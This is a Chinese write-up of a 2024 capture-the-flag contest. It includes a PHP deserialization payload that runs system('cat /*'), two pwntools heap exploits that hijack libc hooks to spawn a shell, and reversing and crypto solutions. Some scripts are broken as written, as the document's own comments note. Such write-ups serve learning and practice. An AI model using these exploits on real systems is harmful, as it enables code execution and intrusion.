2024古剑山初赛WP
2024古剑山WP
Web
un
能读源码
<?php
// Challenge source as quoted in the writeup (left as given, not patched here).
// error_reporting(0) silences every warning/notice, so failing calls below fail quietly.
error_reporting(0);
/**
 * Gadget class from the challenge source.
 *
 * The two magic methods are what make the unserialize() entry point below
 * dangerous: __wakeup() throws (intended to block deserialization of this
 * class), while __destruct() performs dynamic calls whose callee and argument
 * are read from the $aaa property, i.e. from serialized, caller-supplied data.
 */
class pop
{
    /** @var mixed Array read by __destruct(): indexes 1, 2 and "object" select callee and argument. */
    public $aaa;
    /** @var bool Chooses the __destruct() branch; static properties are not part of serialize() output. */
    public static $bbb = false;

    public function __wakeup()
    {
        // PHP 5.4
        // Rejects the object at unserialize() time by throwing before it is used.
        throw new Exception("You're banned to serialize pop!");
    }

    public function __destruct()
    {
        // Two passes. While $bbb is false, call_user_func($this->aaa["object"])
        // runs and its return value becomes $bbb; once $bbb is truthy the other
        // branch calls $this->aaa[1] with $this->aaa[2] as argument — both taken
        // from object state, hence from whatever was deserialized.
        for ($i=0; $i<2; $i++) {
            if (self::$bbb) {
                $this->aaa[1]($this->aaa[2]);
            } else {
                self::$bbb = call_user_func($this->aaa["object"]);
            }
        }
    }
}
// Request handling. Both branches consume raw $_GET values.
if (isset($_GET["code"])) {
    // Untrusted deserialization: caller-supplied bytes reach unserialize(), so any
    // loaded class with magic methods (pop above) becomes a gadget. External input
    // should never be unserialize()d; json_decode() or the allowed_classes option
    // are the defensive alternatives.
    unserialize(base64_decode($_GET["code"]));
} elseif (isset($_GET["f"])) {
    if(is_string($_GET["f"]) === false){
        echo "The f param must be string";
        exit();
    }
    $user_f = $_GET["f"];
    // Character denylist for the file name. Denylists are brittle: this one does not
    // cover '.' or alphanumerics, so plain relative names pass through.
    $regex = "/[ <>?!@#$%&*()+=|\\-\\\\}{:\";'~`,\\/]/";
    if(preg_match($regex, $user_f)){
        // $user_f (which by now contains a rejected character such as < > " ') is echoed
        // back unescaped into the HTML response — reflected XSS; htmlspecialchars() would fix it.
        echo "The ".$user_f." has been detected by regular expression: ".$regex;
        exit();
    }
    // File read bounded only by the regex above (this is the "read the source" path).
    echo file_get_contents($user_f);
}else{
    echo "<a href='/index.php?f=secret'>show me secret!</a>";
}
直接打就行,绕一下wakeup
<?php
// Payload generator from the writeup: re-declares the class locally and prints
// one serialized instance; the unserialize() happens on the target.
error_reporting(0);
/**
 * Local copy of the target's class, so serialize() emits the matching class
 * name and property layout. Only the method bodies differ in purpose: here
 * they are never executed. $bbb is true in this copy, but static properties
 * are not included in serialize() output, so the value has no effect on the payload.
 */
class pop
{
    /** @var mixed Populated below with the values the target's __destruct() reads. */
    public $aaa;
    public static $bbb = true;

    public function __wakeup()
    {
        // PHP 5.4
        throw new Exception("You're banned to serialize pop!");
    }

    public function __destruct()
    {
        for ($i=0; $i<2; $i++) {
            if (self::$bbb) {
                $this->aaa[1]($this->aaa[2]);
            } else {
                self::$bbb = call_user_func($this->aaa["object"]);
            }
        }
    }
}
$var = new pop();
// Property layout consumed by the target's __destruct(): aaa["object"] is the
// first-pass callee, aaa[1]/aaa[2] the second-pass callee and argument.
$var->aaa[1] = "system";
$var->aaa[2] = "cat /*";
$var->aaa["object"]="phpinfo";
// NOTE(review): $a is never assigned in this script; the instance built above is $var,
// so as written this serializes NULL.
echo base64_encode(serialize($a));
Misc
蓝书包(一血)
下载附件,发现很多压缩包,一开始考虑是时间戳隐写,banzip爆破了一下发现有密码
试了试发现有规律
10001
10002
10003
之后GPT搞个脚本
import pyzipper
import os
# Folder configuration.
# NOTE(review): machine-specific absolute paths (local user profile plus a browser
# download GUID) are hard-coded; read them from argv/env before sharing the script.
source_folder = r"C:\Users\15747\AppData\Local\Temp\MicrosoftEdgeDownloads\aa788e29-bd40-41e0-b408-0e2393c58c47\069db7f5cb3f400ba9a1eef0ebb78390"
destination_folder = r"C:\Users\15747\AppData\Local\Temp\MicrosoftEdgeDownloads\aa788e29-bd40-41e0-b408-0e2393c58c47\1"
# 解压并处理每个 ZIP 文件
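def extract_zip_files(source_folder, destination_folder, count=182):
    """Extract ``1.zip`` .. ``<count>.zip`` from *source_folder* into *destination_folder*.

    Archive ``<i>.zip`` is opened with the password ``'1' + i`` zero-padded to
    four digits (10001, 10002, ..., 10182 by default), the pattern observed in
    the challenge files. Extraction is best-effort: a failure on one archive is
    printed and the loop moves on to the next one.

    Args:
        source_folder: Directory holding the numbered archives.
        destination_folder: Directory the archive contents are written to.
        count: Number of archives to process (``1`` .. ``count``). Defaults to
            182, the range the original script hard-coded.
    """
    for file_index in range(1, count + 1):
        zip_file_path = os.path.join(source_folder, f'{file_index}.zip')
        # Password derived from the index, e.g. 10001, 10002, ..., 10182.
        password = f'1{file_index:04d}'
        print(f"处理文件 {zip_file_path} 使用密码 {password}")
        try:
            with pyzipper.AESZipFile(zip_file_path) as zip_file:
                zip_file.setpassword(password.encode())
                # NOTE(review): these archives are downloaded, untrusted data. CPython's
                # zipfile.extractall() strips absolute paths and '..' components; this
                # relies on pyzipper inheriting that behaviour — confirm for the version in use.
                zip_file.extractall(destination_folder)
            print(f"解压成功: {zip_file_path}")
        except Exception as e:
            # Deliberate best-effort: a wrong password or a missing archive must not stop the batch.
            print(f"解压失败: {zip_file_path}, 错误: {e}")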
# Run the extraction with the folders configured above.
extract_zip_files(source_folder, destination_folder)
之后发现有PNG头,拼接一下
import os
# Folder configuration.
# NOTE(review): hard-coded personal paths (a WeChat account directory); the output
# file is written into the same folder the fragments are read from.
source_folder = r"E:\Documents\WeChat Files\wxid_z1ez13mhhho722\FileStorage\File\2024-11\ouy"
output_file_path = r"E:\Documents\WeChat Files\wxid_z1ez13mhhho722\FileStorage\File\2024-11\ouy\1.png"
# 函数:生成从 'aa' 到 'gz' 的文件名列表
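def generate_file_names(prefix='s', suffix='.png'):
    """Return the 676 candidate fragment names ``<prefix>aa<suffix>`` .. ``<prefix>zz<suffix>``.

    The two variable characters run over the lowercase alphabet (the original
    comments said A-Z, but ``chr(97 + i)`` is lowercase), in order:
    'saa.png', 'sab.png', ..., 'szz.png'. Names that do not exist on disk are
    skipped by the caller, so over-generating is harmless.

    Args:
        prefix: Fixed leading part of each name. Defaults to 's'.
        suffix: Fixed trailing part (extension). Defaults to '.png'.

    Returns:
        list[str]: The generated names, first letter varying slowest.
    """
    letters = [chr(97 + i) for i in range(26)]  # 'a' .. 'z'
    return [f'{prefix}{first}{second}{suffix}' for first in letters for second in letters]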
# All candidate fragment names, in the order they are concatenated.
file_names_to_concatenate = generate_file_names()
# 拼接文件(以二进制模式)
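def concatenate_files(file_names, source_folder, output_file_path):
    """Append the raw bytes of every readable *file_names* entry to *output_file_path*.

    Fragments are taken from *source_folder* in list order and copied verbatim
    (binary mode), which is how the split PNG is reassembled. A fragment that
    cannot be opened or read is reported and skipped — most generated candidate
    names do not exist, so this is expected rather than an error.

    Args:
        file_names: Ordered fragment file names, relative to *source_folder*.
        source_folder: Directory containing the fragments.
        output_file_path: Destination file; created or truncated before writing.
    """
    with open(output_file_path, 'wb') as output_file:
        for file_name in file_names:
            file_path = os.path.join(source_folder, file_name)
            try:
                with open(file_path, 'rb') as file_to_concatenate:
                    output_file.write(file_to_concatenate.read())
                print(f'{file_name} 拼接成功')
            except OSError as e:
                # Only filesystem errors (missing/unreadable fragment) are expected
                # here; anything else should surface instead of being swallowed.
                print(f'拼接 {file_name} 时出错: {e}')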
# Reassemble the fragments into the single output file.
concatenate_files(file_names_to_concatenate, source_folder, output_file_path)
得到一个png,之后猜测cloacked-pixel爆破
jpg
附件一个加密压缩包,winhex看了一下发现伪加密,工具修一下
得到一个flag.pdf,winhex看了一下里面有一个图片,PS打开得到一个二维码
得到一个sha256,AR做一下明文攻击
得到flag.txt
Pwn
mis
一开始发现没有uaf还挺头疼的
但是发现可以进行堆溢出,修改了chunk1的size发现可以重叠泄露libc
劫持free_hook为system即可
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
fn='./pwn'
libc=ELF('./libc.so.6')
# Target switch: 1 = remote, 0 = local process.
eir = 0
if eir == 1:
    # Remote host/port left blank in the published script.
    p=remote("",)
elif eir == 0:
    p=process(fn)
elf=ELF(fn)
def open_gdb_terminal():
    """Open a gnome-terminal that attaches gdb to the running target ``p``.

    The gdb command attaches to ``p.pid`` and disables the pager's height and
    width limits; after gdb exits the terminal drops into an interactive bash.
    """
    target_pid = p.pid
    gdb_options = " ".join(
        f"-ex '{option}'"
        for option in (f"attach {target_pid}", "set height 0", "set width 0")
    )
    attach_cmd = f"gdb {gdb_options}"
    terminal_argv = [
        "gnome-terminal",
        "--geometry=120x64+0+0",
        "--",
        "bash",
        "-c",
        f"{attach_cmd}; exec bash",
    ]
    subprocess.Popen(terminal_argv)
def dbg():
    """Attach gdb in a new terminal, then block until the user resumes."""
    open_gdb_terminal()
    pause()
def sa(s, n):
    """Send *n* once *s* has been received."""
    return p.sendafter(s, n)


def sla(s, n):
    """Send *n* plus newline once *s* has been received."""
    return p.sendlineafter(s, n)


def sl(s):
    """Send *s* followed by a newline."""
    return p.sendline(s)


def sd(s):
    """Send *s* as-is."""
    return p.send(s)


def rc(n):
    """Receive up to *n* bytes."""
    return p.recv(n)


def ru(s):
    """Receive until *s* is seen."""
    return p.recvuntil(s)


def ita():
    """Hand the connection over to the user."""
    return p.interactive()


def l64():
    """Read through the next 0x7f byte and unpack the last 6 bytes as a little-endian 64-bit value."""
    return u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))


def pt(s):
    """Print *s* in hex with a leak marker."""
    print("leak----->", hex(s))
def menu(idx):
    """Answer the menu prompt (synchronised on the '4.show' line) with choice *idx*."""
    sa("4.show",str(idx))
def add(idx,cnt):
    """Menu option 1: create note *idx* with content *cnt*.

    The requested size is always 0xf0 regardless of len(cnt); callers rely on
    that fixed size for the heap layout below.
    """
    menu(1)
    sa("Input index: ",str(idx))
    sa("Input size: ",str(0xf0))
    sa("Input note: ",cnt)
def dele(idx):
    """Menu option 2: free note *idx*."""
    menu(2)
    sa("Input index: ",str(idx))
def show(index):
    """Menu option 4: print note *index* (used below to leak a libc pointer)."""
    menu(4)
    sa("Input index: ",str(index))
def edit(idx,cnt):
    """Menu option 3: overwrite note *idx* with *cnt* (no length check on the target, per the writeup)."""
    menu(3)
    sa("Input index: ",str(idx))
    sa("Input note: ",cnt)
# --- Stage 1 (writeup): heap overflow into note 1's size, overlap, leak libc ---
add(0,b'a'*0x30)
add(1,b'a'*0x30)
add(2,b'a'*0xf0)
add(3,b'a'*0xf0)
add(4,b'a'*0xf0)
add(5,b'a'*0xf0)
add(6,b'/bin/sh\x00')
# 0x38 bytes of filler reach past note 0's own data; the p64 lands on note 1's size field.
edit(0,b'b'*0x38+p64(0x441))
dele(1)
add(1,b'a'*0x38)
# Note 2 now overlaps freed memory; its contents contain a libc pointer.
show(2)
libc_leak=l64()
pt(libc_leak)
# NOTE(review): leak-to-base offset is specific to the provided libc build; recompute if it differs.
libc_base=libc_leak-0x3ebca0
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
# one_gadget candidates: computed but never used below (the final stage uses system).
ogs=[0x4f35e,0x4f365,0x4f3c2,0x10a45c]
og=libc_base+ogs[0]
# --- Stage 2 (writeup): hijack __free_hook to system ---
add(0,b'a'*0x30)
add(1,b'b'*0x30)
add(2,b'c'*0x30)
add(3,b'd'*0x30)
add(4,b'e'*0xf0)
add(5,b'f'*0xf0)
dele(1)
dele(3)
# Overflow from note 2 into the freed note 3: 0x41 on its size field, free_hook on its first qword.
edit(2,b'z'*0x38+p64(0x41)+p64(free_hook))
add(6,b'/bin/sh\x00')
add(7,b'a'*0x30)
add(8,b'a'*0x30)
# Write system's address through whichever of the two allocations landed on the hook.
edit(7,p64(system))
edit(8,p64(system))
# Freeing the "/bin/sh" note triggers the hooked free().
dele(6)
ita()
in
最近见了好多这样的题,利用stdout泄露libc即可
from pwn import *
context.log_level='debug'
context(os='linux', arch='amd64')
p = process('./pwn')
libc = ELF('./libc-2.23.so')
elf = ELF('./pwn')
#p.recv()
# Two size answers; the writeup's approach is to leak libc through stdout.
p.recvuntil(b"Size:\n")
p.sendline(str(0x5e6611))
p.recvuntil(b"Size:\n")
p.sendline(str(0x220000))
p.recv()
p.send(b"\x18")
p.send(b"\x20")
# NOTE(review): the offset is the difference of two addresses copied from a debug
# session; it only holds for this libc build and load layout.
libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - (0x7fbf86558640-0x7fbf86193000)
print("libc_base = " + hex(libc_base))
ogs = [0x45216,0x4526a,0xf02a4,0xf1147]
# NOTE(review): `one_gadgets` is never defined in this script — the list declared above is `ogs`,
# so this line raises NameError as written.
og = libc_base + one_gadgets[3]
# Only the low 3 bytes of the gadget address are sent (partial overwrite).
ogg = p64(og)[:3]
# Hard-coded libc-relative offset; environment-specific like the one above.
exit_hook = libc_base + 0x5f0040+3848
p.recvuntil(b"!\n")
p.sendline(p64(exit_hook))
p.send(ogg)
p.interactive()
Re
re
DIE看没壳,IDA反编译发现有问题,winhex发现进行魔改壳了
直接debug
找到主程序逻辑了,但是一直dump不出来,
从网上搜到原题
[re]无需脱壳dump内存来静态分析_ida vmp分析-CSDN博客
直接交文章中的flag就行
India Pale Ale
添加后缀zip,之后解压缩,把
EasyIOS拖到IDA里就能正常分析了
换表base+rc4
key是SimpleKeyHere异或0xa5
import base64
from Crypto.Cipher import ARC4
# Custom base64 alphabet used by the binary, and the standard one it maps onto.
table1 = "NF01ihUKST9q3lnjEBs47k2w5ad+AVHfPezg/CDyxrMLR6GvomIQJOXcpW8ZbutY="
table2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
# Encoded bytes recovered from the binary, as signed char values.
data = [
    -24, -24, -60, -54, -95, -46, -45, -3, -96, -96, -63, -7,
    -87, -40, -3, -22, -36, -47, -32, -62, -59, -88, -90, -31,
    -24, -45, -9, -43, -91, -60, -13, -40, -55, -95, -34, -46,
    -27, -25, -33, -9, -32, -40, -32, -41
]
# Step 1: mask each signed value to a byte and undo the 0x90 XOR.
c = bytes((x & 0xFF) ^ 0x90 for x in data).decode()
print(c)
# Step 2: map the custom alphabet back to standard base64, then decode.
decoded_flag = base64.b64decode(c.translate(str.maketrans(table1, table2)))
# Step 3: RC4 key is "SimpleKeyHere" with every byte XORed with 0xA5.
key = b"SimpleKeyHere"
key_bytes = bytes(x ^ 0xA5 for x in key)
flag = ARC4.new(key_bytes).decrypt(decoded_flag)
print(flag)
b'flag{45_4_105_r3v3r51n6_b361nn3r}'
Crypto
cs
一开始考虑的是进制,后来转了一下没啥想法,进行2、2分组,发现只有两种组合,j后面跟一个数字,k后面跟一个数字
之后做位移,发现要不就是偏移2要不就是12
jh => f
jn => l
jc => a
ji => g
依次类推,得到
flagathisisrealflagc
猜测把a和c改为{}
flag{thisisrealflag}